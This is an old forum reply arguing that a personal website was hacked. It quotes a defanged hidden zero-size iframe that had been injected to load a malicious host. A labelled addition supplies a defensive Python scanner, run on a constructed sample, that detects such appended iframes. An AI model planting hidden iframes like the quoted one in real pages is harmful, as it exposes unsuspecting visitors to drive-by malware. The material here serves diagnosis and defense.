03-15-2008, 07:15 PM
David H. Lipman
Re: WARNING: Roy Schestowitz is spreading virusses on his website, don't go there!!!!!!!!

From: "Tim Smith" <reply_in_group@mouse-potato.com>

| In article <642dveF2a7vd5U1@mid.dfncis.de>,
| "Sebastian G." <seppi@seppig.de> wrote:
| >>> You can sit here and twist all you like, but YOUR SITE WAS COMPROMISED AND
| >>> USED TO INFECT OTHERS.
| >>
| >> There's no indication that his website was compromised. Stating it in big
| >> letters doesn't make it any less false.
|
| You don't consider someone other than yourself editing the pages on your
| website to be being compromised?
|

The following was appended to the HTML of the web site...
{ obfuscated code }

<i frame src="hxxp://pinoc.com/count.php?o=2" width=0 height=0 style="hidden" frameborder=0
marginheight=0 marginwidth=0 scrolling=no></i frame>

As Ant noted, pinoc.com is a suspended site associated with ESTDomains.

There is a well established link between ESTDomains and malicious web sites that are
designed to do nothing more than infect the unsuspecting visitor.

The site was hacked and thus compromised.

The ONLY question that should be now asked is...
What was the exploitation vector that was used to compromise the web site?

--
Dave
http://www.claymania.com/removal-trojan-adware.html
Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp
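
A defender-side check for the kind of markup quoted in the post above, added here as an example that is not part of the original post: it scans a page for iframes that are zero-sized, styled as hidden, or placed after the closing `</html>` tag and that load from a host other than the site's own. The sample page, the host names (`blog.example.org`, `video.example.com`, `counter.example.net`) and the function name `find_hidden_iframes` are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a normal page with an iframe appended after </html>,
# shaped like the one quoted in the post (placeholder host names).
SAMPLE_HTML = """<html><body>
<h1>My blog</h1>
<iframe src="https://video.example.com/embed/1" width="560" height="315"></iframe>
<iframe src="/local/widget.html" width="0" height="0"></iframe>
</body></html>
<iframe src="http://counter.example.net/count.php?o=2" width=0 height=0
 style="hidden" frameborder=0 scrolling=no></iframe>
"""

ZERO = {"0", "0px"}

class HiddenIframeFinder(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.after_html_end = False   # set once </html> has been seen
        self.findings = []            # (line, host, reasons)

    def handle_endtag(self, tag):
        if tag == "html":
            self.after_html_end = True

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "").strip() for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        style = a.get("style", "").lower().replace(" ", "")
        reasons = []
        if a.get("width") in ZERO or a.get("height") in ZERO:
            reasons.append("zero-size")
        if "hidden" in style or "display:none" in style:
            reasons.append("hidden-style")
        if self.after_html_end:
            reasons.append("after-</html>")
        # Only report frames that load from a host other than the site itself.
        if host and host != self.site_host and reasons:
            self.findings.append((self.getpos()[0], host, reasons))

def find_hidden_iframes(html, site_host):
    finder = HiddenIframeFinder(site_host)
    finder.feed(html)
    finder.close()
    return finder.findings

if __name__ == "__main__":
    for line, host, reasons in find_hidden_iframes(SAMPLE_HTML, "blog.example.org"):
        print(f"line {line}: iframe from {host} ({', '.join(reasons)})")
```

Running it over every served page and diffing the findings against a known-good copy shows when such a tag was appended, which helps narrow down the time window to search in server and FTP logs.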